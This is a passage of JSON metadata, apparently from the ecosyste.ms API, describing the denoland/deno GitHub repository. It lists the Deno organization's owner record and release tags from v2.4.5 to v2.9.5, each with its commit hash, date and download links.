reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/